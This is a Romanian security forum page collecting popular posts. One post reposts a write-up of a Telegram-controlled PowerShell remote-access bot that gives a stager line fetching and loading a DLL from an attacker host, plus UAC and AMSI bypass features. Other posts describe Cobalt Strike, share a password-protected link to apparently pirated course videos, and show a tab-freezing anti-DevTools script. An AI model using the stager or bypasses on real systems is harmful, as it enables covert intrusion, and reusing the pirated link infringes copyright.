Jump to content


Popular Content

Showing content with the highest reputation since 12/20/18 in Posts

  1. 10 points
    Lamultzani! http://rstelion.cf/
  2. 8 points
    1- Web Application Penetration Testing eXtreme (eWPTX ) ---------------------------------------------------- 03. Website_cloning.mp4 03. From_An_XSS_To_A_SQL_Injection.mp4 03. Keylogging.mp4 09. Advanced XXE Exploitation.MP4 07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4 05. Advanced_XSRF_Exploitation_part_i.mp4 06. Advanced_XSRF_Exploitation_part_ii.mp4 09. Advanced_Xpath_Exploitation.mp4 WAPTx sec 9.pdf WAPTx sec 8.pdf WAPTx sec 2.pdf WAPTx sec 3.pdf WAPTx sec 5.pdf WAPTx sec 6.pdf WAPTx sec 4.pdf WAPTx sec 7.pdf WAPTx sec 1.pdf 2- Penetration Testing Professional (ePTPv3) 3- Web Application Penetration Testing (eWAPT v2) ---------------------------------------------------- Penetration Testing Process Introduction Information Gathering Cross Site Scripting SQL Injection Authentication and Authorization Session Security HTML5 File and Resources Attacks Other Attacks Web Services XPath https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I Pass: P8@Hu%vbg_&{}/2)p+4T Sursa:
  3. 8 points
    Am descoperit un site mai devreme care are protectie impotriva DevTools, mai exact, daca il vede deschis, se sterge tot continutul HTML automat si nu se mai incarca niciun script. Mi se pare destul de interesant, mai ales impotriva scrapangiilor, asa ca mi-am facut si eu o jucarioara bazata pe un tool open source de detectie. Il instalati cu: npm install --save devtools-detect Si il folositi astfel: const devtools = require('devtools-detect/index'); if (window.location.hostname === 'domeniu.com') { setInterval(() => { if (devtools.open) { document.body.innerHTML = ':)'; for (;;) find(); } }, 1e3); } Primul if verifica daca e pe site-ul live, pentru a putea sa-l evitam cand dezvoltam aplicatia local, cu un hostname local. Linia: document.body.innerHTML = ':)'; Sterge tot HTML-ul. Iar linia: for (;;) find(); E doar o jucarie interesanta de a tine procesorul ocupat la infinit. Practic tab-ul ingheata si nu mai reactioneaza la interactiuni. Ceva de genul: for (;;) debugger; Presupun ca ar fi la fel de enervant. Insa nu am testat asta. --- Sunt curios daca folositi si voi astfel de protectii sau daca ati observat vreunele prin alte parti.
  4. 6 points
    Pentru Firefox: In adress-bar scrieti: about:config Enter - "I accept the risk!" La search: "esni.enabled" si dublu click pentru enable Dati iar la search: "trr.mode" Dublu click pentru modificare, apoi treceti 2 ( DNS Over HTTPS ) Reporniti Firefox, apoi intrati la https://encryptedsni.com , ar trebui sa apara :
  5. 6 points
    Un articol foarte interesant. Mi-a căzut ochii pe el datorită folosirii analizorului spectral Baudline, pe care-l folosesc frecvent în recepția radio în spectrul VLF. Extragerea cheii RSA prin criptanaliză acustică cu bandă scurtă. Multe computere emit un zgomot ridicat în timpul funcționării, datorită vibrațiilor în unele dintre componentele lor electronice. Aceste emisiii acustice sunt mai mult decât o provocare: pot transmite informații despre software-ul rulat pe computer și, mai ales, pot scurge informații sensibile despre calculele legate de securitate. Link: http://www.cs.tau.ac.il/~tromer/acoustic/ Baudline: http://www.baudline.com/ Și un "apropo". Unul din autori, Adi Shamir a fost implicat în scandalul prelucrării ilegale de date al firmei izraeliene de securitate în software, Black Cube.
  6. 5 points
    Introduction In this post I will share some experience I had while working on a project named Telepreter. Telepreter is a PowerShell Runspace that uses Telegram bot API as transport and communications and C# DLL reflection to stay in-memory. So you can control your shells with a Telegram group and a single bot. Even further, I tried to add my favorite tools into it. So it has builtin AMSI and UAC bypasses from my earlier blog posts and some other excellent tools that I like very much like PowerView and PowerPreter. Side-Note: This is just a PoC, and an idea that I wanted to make it happen. I do not intend to develop further into it. Building a Telegram Bot with PowerShell execution capabilities So I decided to build a Telegram bot, capable of remote controlling a Windows computer. But more importantly that I wanted it fileless, so I chose using C# + PowerShell again, so we can operate in-memory and not rely at all with disk. Telegram API choice I researched some libraries in C# that might suit my need, and found one that had all the functionalities that I wished for in this repository; After compiling the code, I had a Telegram.Bot.dll and NewtonSoft.dll which are dependencies. Initial problems I had to work out with loading these DLL’s in a manner that would not drop anything on disk. So I resorted to Reflection (again…). Compressing and obfuscating all the DLL code into a base64 string constant value, I am able create a function that can load this assemblies in memory so we won’t have any exception when Telegram API functions are invoked. Crafting a small fileless Powershell stager payload To start a new bot instance on our victim, all it needs to be executed is the following line in PowerShell: [Reflection.Assembly]::Load((iwr attackerc2.com/telepreter.dll).Content)/[Telepreter.Agent]::Load();[Telepreter.Agent]::new().Start() Which in turn, I developed and integrated into the bot a function to create a stager payload. This way, an attacker can create .bat which could be used to infect more computers inside the network or spawning elevated bot instances (more on this later) Core functionalities How to control the bot To execute a command, simply type /bot:BOT_ID /shell PowerShellCommandHere PS: Dont worry about output size. The bot will send 200 lines once a second, so every output is sent to you! How to download files To download a file, simply type /bot:BOT_ID /download C:\windows\system32\license.rtf and Bot will send this file in group using Telegram file upload API! How to Port Scan with it! It is also useful for Recon, too! There is a sightly modified version of Invoke-Portscan from Nishang pack. No need to do fancy pivoting tricks to scan the internal network! How to bypass UAC with it! Check how I bypassed UAC in a Lab computer that was infected with it! In the above picture, I created a .bat stager that resided in the user temporary folder. This tiny stager will fetch the DLL using the supplied URL and then use reflection to load all dependencies and start the main function of the bot. Looking the picture above, it is possible to observe that a new instance of a bot has started. And the Administrator flag is set to True, which means this is an elevated session and we can use post-exploitation tools like Invoke-Mimikatz or others that require elevated privileges to work. To avoid having problems with multiple instances, never stay with more than one active session. Conclusion and Code This concludes the demonstration of this fun project I was working for a few days. Feel free to dig into it as much you want to. Probably a lot of people are going to say that it is crappy code… but it really is! I am no professional programmer. It is just an demonstration of how something like that could work. Of course that there are a ton of better ways of doing it. So feel free to do it if you like! To get access to the source-code: Link To start your own bot Just replace the following values in the code: Have fun. Best regards, zc00l. Source https://0x00-0x00.github.io/tools/2018/12/10/Pwning-Computers-using-Telegram-bot-API.html
  7. 5 points
    La Multi Ani tuturor si un an plin de realizari !!!
  8. 5 points
    Foto: Mihai Ciobanu Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018). Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018). Directiva NIS ( Network Internet Security) stabilește la nivel european un sistem unitar de prevenire și răspuns la incidentele de securitate informatică, având drept scop protejarea și stimularea dezvoltării Pieței Digitale Unice, prin crearea la nivelele naționale a mecanismelor adecvate. În context, obiectivele actului normativ promulgat astăzi sunt: *stabilirea cadrului de cooperare la nivel național și de participare la nivel european și internațional în domeniul asigurării securității rețelelor și sistemelor informatice, *crearea cadrului instituțional prin desemnarea Centrului Național de Răspuns la Incidente de Securitate Cibernetică – CERT-RO ca autoritate competentă, *desemnarea entităților de drept public și privat care dețin competențe și responsabilități în aplicarea prevederilor prezentei legi, *desemnarea punctului unic de contact la nivel național și a echipei naționale de răspuns la incidente de securitate informatică – Centrul Național de Răspuns la Incidente de Securitate Cibernetică (CERT-RO) *stabilirea cerințelor de securitate și notificare pentru operatorii de servicii esențiale și pentru furnizorii de servicii digitale și instituirea mecanismelor de actualizare a acestora în funcție de evoluția amenințărilor la adresa securității rețelelor și sistemelor informatice Mecanisme de cooperare în caz de necesitate Astfel, se instituie mecanisme de cooperare în caz de necesitate între (CERT-RO )și autoritățile competente pe sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, în vederea preîntâmpinării situațiilor în care incidente de securitate informatică inițial minore, care afectează un furnizor de servicii digitale, să evolueze rapid și să afecteze infrastructuri critice naționale sau europene. Sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, sunt: energie, transporturi, bancar, infrastructuri ale pieței financiare, sănătate, furnizare și distribuire de apă potabilă și infrastructură digitală, legea instituind obligații de asigurare a securității și de notificare a incidentelor și furnizorilor de servicii digitale precum: cloud computing, piețe online, motoare de căutare. Via: https://www.dcnews.ro/securitate-informatica--noi-reglementari-intrate-in-vigoare_630191.html
  9. 4 points
    https://www.youtube.com/watch?v=OZxeZSJ4PlU La multi ani tovarasi colegi de forum!
  10. 4 points
  11. 4 points
  12. 4 points
  13. 4 points
  14. 4 points
  15. 4 points
    Overclock la mouse. am mai auzit una. Enough internet for today
  16. 3 points
    "On 11/25/2017 at 6:12 PM, adineamtu01 said:" Atentie la data. De ce aladin vrei sa descarci 10000 de carti odata? Anyway... https://archive.org/ Asta e, pe departe, cea mai buna sursa pe care o stiu eu. Am gasit pana si "Introducere in algoritmi" de Thomas H Cormen, carte care costa peste 500 de ron, in limba romana, full.
  17. 3 points
  18. 3 points
  19. 3 points
    Dar sa-ti schimbi egarii inainte.
  20. 3 points
    Streaming: http://streaming.media.ccc.de/35c3 Schedule: https://fahrplan.events.ccc.de/congress/2018/Fahrplan/ Ca in fiecare an, sunt multe prezentari interesante. PS: Nu sunt doar prezentari de "security", dar cele care sunt, merita vazute.
  21. 3 points
    root este contul de administrator de pe sistemele de operare tip UNIX. In general nu prea are restrictii impuse. In modul in care l-ai vazut utilizat, face referire la a avea/capata (probabil ilegal) acces la acest cont, pe un computer. Din moment ce acest cont nu are restrictii, poate fi utilizat pentru activitatile distructive, gen flood. PuTTY este un client SSH/Telnet/Rlogin/Serial/Raw, dezvoltat initial pentru Windows, deoarece Windows nu dispune de un client SSH propriu.
  22. 3 points
    Din ce am vazut in https://github.com/rvrsh3ll/SharpFruit/blob/master/SharpFruit/app.config e doar de forma. Nu are ceva relevant configurat acolo. Cobalt Strike este conceput plecand de la premisa unei echipe de atacatori ce lucreaza impreuna. Este impartit intr-un server si un client. Serverul, sub forma binarului teamserver, este managerul systemelor infectate, si gazda functionalitatii social engineering. De asemenea tine si datele colectate de pe victime. Clientul, sub forma unei arhive java cobaltstrike.jar, este generatorul de noi payload-uri Beacon, interfata prin care interactionezi cu beacon-urile conectate la serverul (sau serverele) la care este conectat, etc. Beacon este payload-ul, asemanator cu meterpreter din metasploit. Modul in care va rula, depinde de modul de infectie. Dar in ziua de azi, probabil va fi un binar, sunt mai rare exploit-urile ce permit executarea arbitrara de cod. Mult mai simplu este sa pacalesti un utilizator sa iti ruleze "fericirea". Marele avantaj al acestei arhitecturi reiese din abilitatea de a avea mai multe servere, in functie de nevoi si de nivelul de invizibilitate necesar. Pentru mai multe informatii iti recomand https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki/blob/master/README.md ca punct de plecare. Referinte: Manualul Cobalt Strike Pagina de help a Beacon Anuntul de pe blog, a functiei execute-assembly https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
  23. 3 points
  24. 3 points
    Lasa toate datele tale aici
  25. 3 points